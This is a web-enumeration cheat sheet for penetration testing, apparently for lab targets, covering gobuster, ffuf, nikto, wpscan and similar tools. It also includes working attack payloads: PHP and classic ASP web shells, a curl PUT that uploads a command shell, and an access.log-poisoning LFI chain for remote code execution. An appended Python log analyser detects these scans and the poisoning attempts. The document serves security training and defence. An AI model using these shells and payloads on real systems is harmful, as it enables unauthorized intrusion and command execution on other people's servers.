
# HTTP Enum

#### ***`The main thing to remember here is to always run against multiple wordlists, starting with directory-list-2.3-medium.txt`***

### Gobuster

```
# URL search

# Quick directory busting
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux

# Comprehensive directory busting (on gobuster 3.1+ add -b "" so the default 404 blacklist does not conflict with -s)
gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

# Search with file extensions
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php

# DNS search (subdomain brute force)
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt

# vhost search
gobuster vhost -u https://anysite.com -w common-vhosts.txt
```

### FFUF

```
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
```

### **Nikto Web Scan**

```
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range
```

### Wordpress Scan

```
wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/

# --enumerate takes a comma-separated list of the switches below, e.g. u,vp,vt
wpscan --url http://10.10.10.10/wp/ --enumerate u,vp,vt

**** User ****
u:  enumerate users

**** Plugin switches ****
p:  popular plugins only
vp: vulnerable plugins only
ap: all plugins

**** Theme switches ****
t:  popular themes only
vt: vulnerable themes only
at: all themes
```

### Drupal

```
droopescan scan drupal -u http://10.10.10.10/ -t 32
```

### Joomla

```
joomscan -u http://10.10.10.10/
```

### Dirb

```
dirb http://10.10.10.x

******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats

dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

-x : use this extension list against the wordlists within big.txt
```

### Dirsearch

```
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>

# Example
python3 dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: URL to scan.
-e: extensions to search for.
-w: wordlist.
```

### Netcat

```
nc 10.10.10.10 80
HEAD / HTTP/1.0
GET / HTTP/1.0

# Press Enter twice after the request line: the empty line terminates the request.
```

### cUrl

```
# Header
curl -i INSERTIPADDRESS

# Everything else
curl -i -L INSERTIPADDRESS

# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Upload possible?
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
```

### Wfuzz

```
----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php

----URL testing----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ

----DNS fuzzing----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62
```

### **Upload a PHP file**

```
In case you can upload a file try the below. This can be used for reverse shell too.

<?php echo system($_GET["cmd"]);?>

OR

<?php echo shell_exec($_GET["cmd"]);?>
```

### WebDav

```
davtest -url http://10.10.10.10    <-- Test which file extensions the server accepts for upload.
cadaver http://10.10.10.10/        <-- Connect
```

### ASPx Webshell

```
<%
' Classic ASP (VBScript): runs a command and writes its output into the response
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.ReadAll()
Response.write(o)
%>
```

### Code Execution through HTTP/LFI

```
nc 10.10.10.10 80
<?php system($_GET['cmd']); ?>

# The line above is logged verbatim in access.log. On the LFI you have discovered,
# include that log file and add the cmd parameter:
?cmd=id
&cmd=id

http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami
```
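As an added defender-side example (not from the original page), the following Python script parses constructed Apache access-log lines and flags the traces the tools on this page leave behind: a burst of 404/403 responses from one client (directory busting with gobuster, ffuf, dirb or dirsearch, even when `-a Linux` hides the tool's user agent), known scanner user agents (Nikto, wpscan), and request lines carrying a `<?php` tag, which is exactly what the access.log poisoning step above writes into the log. The log lines, addresses and the threshold are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format log lines (sample data, not from the page):
# a directory-busting burst, a log-poisoning attempt, normal traffic, and a Nikto hit.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /config.php HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /uploads HTTP/1.1" 403 199 "-" "gobuster/3.1.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /test HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /<?php system($_GET['cmd']); ?> HTTP/1.0" 404 196 "-" "-"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.8 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Nikto/2.1.6)"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
SCANNER_UA = re.compile(r"gobuster|ffuf|nikto|wfuzz|dirb|dirsearch|wpscan", re.I)
POISON = re.compile(r"<\?php|<\?=")  # PHP open tag in a request line = access.log poisoning attempt

def analyze(log_text, miss_threshold=4):
    """Return per-source findings: 404/403 bursts, scanner user agents, PHP tags in requests.

    The miss-count heuristic matters because a user-agent override such as `-a Linux`
    defeats UA matching; a wordlist run still leaves a trail of 404s from one client.
    """
    misses = defaultdict(int)
    scanner_ips = {}
    poison = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, skip
        ip, req, status, ua = m["ip"], m["req"], int(m["status"]), m["ua"]
        if status in (403, 404):
            misses[ip] += 1
        if SCANNER_UA.search(ua):
            scanner_ips[ip] = ua
        if POISON.search(req):
            poison.append((ip, req))
    brute_force = sorted(ip for ip, n in misses.items() if n >= miss_threshold)
    return {"brute_force": brute_force, "scanner_ua": scanner_ips, "poison": poison}

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Run it against a real access.log by passing the file contents to `analyze()`; the threshold should be raised for busy sites where 404s from one client are routine.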
